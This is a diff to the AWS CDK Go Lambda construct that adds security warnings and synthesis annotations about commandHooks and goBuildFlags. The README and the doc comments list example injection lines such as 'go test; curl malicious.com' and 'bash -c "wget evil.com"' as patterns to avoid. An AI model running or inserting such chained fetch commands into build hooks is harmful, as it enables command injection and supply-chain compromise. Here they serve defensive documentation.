aws
diff --git a/‎packages/@aws-cdk/aws-lambda-go-alpha/README.md‎
Lines changed: 102 additions & 4 deletions b/‎packages/@aws-cdk/aws-lambda-go-alpha/README.md‎
Lines changed: 102 additions & 4 deletions
diff --git a/‎packages/@aws-cdk/aws-lambda-go-alpha/lib/function.ts‎
Lines changed: 16 additions & 0 deletions b/‎packages/@aws-cdk/aws-lambda-go-alpha/lib/function.ts‎
Lines changed: 16 additions & 0 deletions
diff --git a/‎packages/@aws-cdk/aws-lambda-go-alpha/lib/types.ts‎
Lines changed: 38 additions & 9 deletions b/‎packages/@aws-cdk/aws-lambda-go-alpha/lib/types.ts‎
Lines changed: 38 additions & 9 deletions
@@ -170,6 +170,8 @@ new go.GoFunction(this, 'handler', {
 });
 ```
 
+**⚠️ Security Warning**: Build flags are passed directly to the Go build command and can execute arbitrary commands during bundling. Only use trusted values and avoid flags like `-toolexec` with untrusted arguments. Be especially cautious with third-party CDK constructs that may contain malicious build flags. The CDK will display a warning during synthesis when `goBuildFlags` is used.
+
 By default this construct doesn't use any Go module proxies. This is contrary to
 a standard Go installation, which would use the Google proxy by default. To
 recreate that behavior, do the following:
@@ -200,19 +202,21 @@ new go.GoFunction(this, 'GoFunction', {
 
 ## Command hooks
 
-It is  possible to run additional commands by specifying the `commandHooks` prop:
+It is possible to run additional commands by specifying the `commandHooks` prop:
 
-```text
-// This example only available in TypeScript
+```ts
 // Run additional commands on a GoFunction via `commandHooks` property
 new go.GoFunction(this, 'handler', {
+  entry: 'cmd/api',
   bundling: {
     commandHooks: {
       // run tests
       beforeBundling(inputDir: string): string[] {
         return ['go test ./cmd/api -v'];
       },
-      // ...
+      afterBundling(inputDir: string, outputDir: string): string[] {
+        return ['echo "Build complete"'];
+      },
     },
   },
 });
@@ -230,6 +234,100 @@ an array of commands to run. Commands are chained with `&&`.
 The commands will run in the environment in which bundling occurs: inside the
 container for Docker bundling or on the host OS for local bundling.
 
+### ⚠️ Security Considerations
+
+**Command hooks execute arbitrary shell commands** during the bundling process. Only use trusted commands:
+
+**Safe patterns (cross-platform):**
+
+```ts
+new go.GoFunction(this, 'SafeFunction', {
+  entry: 'cmd/api',
+  bundling: {
+    commandHooks: {
+      beforeBundling: () => [
+        'go test ./...',           // ✅ Standard Go commands work on all OS
+        'go mod tidy',             // ✅ Go module commands
+        'make clean',              // ✅ Build tools (if available)
+        'echo "Building app"',     // ✅ Simple output with quotes
+      ],
+      afterBundling: () => ['echo "Build complete"'],
+    },
+  },
+});
+```
+
+**Dangerous patterns to avoid:**
+
+*Windows-specific dangers:*
+
+```ts
+// ❌ Windows-specific dangers
+new go.GoFunction(this, 'UnsafeWindowsFunction', {
+  entry: 'cmd/api',
+  bundling: {
+    commandHooks: {
+      beforeBundling: () => [
+        'go test & curl.exe malicious.com',     // ❌ Command chaining with &
+        'echo %USERPROFILE%',                   // ❌ Environment variable expansion
+        'powershell -Command "..."',            // ❌ PowerShell execution
+      ],
+      afterBundling: () => [],
+    },
+  },
+});
+```
+
+*Unix/Linux/macOS dangers:*
+
+```ts
+// ❌ Unix/Linux/macOS dangers
+new go.GoFunction(this, 'UnsafeUnixFunction', {
+  entry: 'cmd/api',
+  bundling: {
+    commandHooks: {
+      beforeBundling: () => [
+        'go test; curl malicious.com',          // ❌ Command chaining with ;
+        'echo $(whoami)',                       // ❌ Command substitution
+        'bash -c "wget evil.com"',              // ❌ Shell execution
+      ],
+      afterBundling: () => [],
+    },
+  },
+});
+```
+
+**When using third-party constructs** that include `GoFunction`:
+
+* Review the construct's source code before use
+* Verify what commands it executes via `commandHooks` and `goBuildFlags`
+* Only use constructs from trusted publishers
+* Test in isolated environments first
+
+The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected.
+
+For more security guidance, see [AWS CDK Security Best Practices](https://docs.aws.amazon.com/cdk/latest/guide/security.html).
+
+## Security Best Practices
+
+### Third-Party Construct Safety
+
+When using third-party CDK constructs that utilize `GoFunction`, exercise caution:
+
+1. **Review source code** - Inspect the construct implementation for `commandHooks` and `goBuildFlags` usage
+2. **Verify publishers** - Use constructs only from trusted, verified sources  
+3. **Pin versions** - Use exact versions to prevent supply chain attacks
+4. **Isolated testing** - Test third-party constructs in sandboxed environments
+
+**Before using any third-party construct:**
+
+* Review the construct's source code on GitHub or npm
+* Search for `commandHooks` and `goBuildFlags` usage in the code
+* Verify no dangerous command patterns are present
+* Use exact version pinning to prevent supply chain attacks
+
+The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected.
+
 ## Additional considerations
 
 Depending on how you structure your Golang application, you may want to change the `assetHashType` parameter.
 
@@ -1,6 +1,7 @@
 import * as fs from 'fs';
 import * as path from 'path';
 import * as lambda from 'aws-cdk-lib/aws-lambda';
+import * as cdk from 'aws-cdk-lib/core';
 import { Construct } from 'constructs';
 import { Bundling } from './bundling';
 import { BundlingOptions } from './types';
@@ -113,6 +114,21 @@ export class GoFunction extends lambda.Function {
     const runtime = props.runtime ?? lambda.Runtime.PROVIDED_AL2;
     const architecture = props.architecture ?? lambda.Architecture.X86_64;
 
+    // Security warnings for potentially unsafe bundling options
+    if (props.bundling?.goBuildFlags?.length) {
+      cdk.Annotations.of(scope).addWarningV2(
+        '@aws-cdk/aws-lambda-go-alpha:goBuildFlagsSecurityWarning',
+        'goBuildFlags can execute arbitrary commands during bundling. Ensure all flags come from trusted sources. See: https://docs.aws.amazon.com/cdk/latest/guide/security.html',
+      );
+    }
+
+    if (props.bundling?.commandHooks?.beforeBundling || props.bundling?.commandHooks?.afterBundling) {
+      cdk.Annotations.of(scope).addWarningV2(
+        '@aws-cdk/aws-lambda-go-alpha:commandHooksSecurityWarning',
+        'commandHooks can execute arbitrary commands during bundling. Ensure all commands come from trusted sources. See: https://docs.aws.amazon.com/cdk/latest/guide/security.html',
+      );
+    }
+
     super(scope, id, {
       ...props,
       runtime,
 
@@ -25,6 +25,11 @@ export interface BundlingOptions extends DockerRunOptions {
    * For example:
    * ['ldflags "-s -w"']
    *
+   * **Security Warning**: These flags are passed directly to the Go build command.
+   * Only use trusted values as they can execute arbitrary commands during bundling.
+   * Avoid flags like `-toolexec` with untrusted arguments, and be cautious with
+   * third-party CDK constructs that may contain malicious build flags.
+   *
    * @default - none
    */
   readonly goBuildFlags?: string[];
@@ -77,6 +82,10 @@ export interface BundlingOptions extends DockerRunOptions {
   /**
    * Command hooks
    *
+   * ⚠️ **Security Warning**: Commands are executed directly in the shell environment.
+   * Only use trusted commands from verified sources. Avoid shell metacharacters
+   * that could enable command injection attacks.
+   *
    * @default - do not run additional commands
    */
   readonly commandHooks?: ICommandHooks;
@@ -125,29 +134,49 @@ export interface BundlingOptions extends DockerRunOptions {
  * These commands will run in the environment in which bundling occurs: inside
  * the container for Docker bundling or on the host OS for local bundling.
  *
+ * ⚠️ **Security Warning**: Commands are executed directly in the shell environment.
+ * Only use trusted commands and avoid shell metacharacters that could enable
+ * command injection attacks.
+ *
+ * **Safe patterns (cross-platform):**
+ * - `go test ./...` - Standard Go commands work on all platforms
+ * - `go mod tidy` - Go module commands
+ * - `echo "Building"` - Simple output with quotes
+ * - `make clean` - Build tools (if available)
+ *
+ * **Dangerous patterns to avoid:**
+ *
+ * *Windows:*
+ * - `go test & curl.exe malicious.com` (command chaining)
+ * - `echo %USERPROFILE%` (environment variable expansion)
+ * - `powershell -Command "..."` (PowerShell execution)
+ *
+ * *Unix/Linux/macOS:*
+ * - `go test; curl malicious.com` (command chaining)
+ * - `echo $(whoami)` (command substitution)
+ * - `bash -c "wget evil.com"` (shell execution)
+ *
  * Commands are chained with `&&`.
  *
- * ```text
- * {
- *   // Run tests prior to bundling
- *   beforeBundling(inputDir: string, outputDir: string): string[] {
- *     return [`go test -mod=vendor ./...`];
- *   }
- *   // ...
- * }
- * ```
+ * @see https://docs.aws.amazon.com/cdk/latest/guide/security.html
  */
 export interface ICommandHooks {
   /**
    * Returns commands to run before bundling.
    *
+   * ⚠️ **Security**: Ensure commands come from trusted sources only.
+   * Commands are executed directly in the shell environment.
+   *
    * Commands are chained with `&&`.
    */
   beforeBundling(inputDir: string, outputDir: string): string[];
 
   /**
    * Returns commands to run after bundling.
    *
+   * ⚠️ **Security**: Ensure commands come from trusted sources only.
+   * Commands are executed directly in the shell environment.
+   *
    * Commands are chained with `&&`.
    */
   afterBundling(inputDir: string, outputDir: string): string[];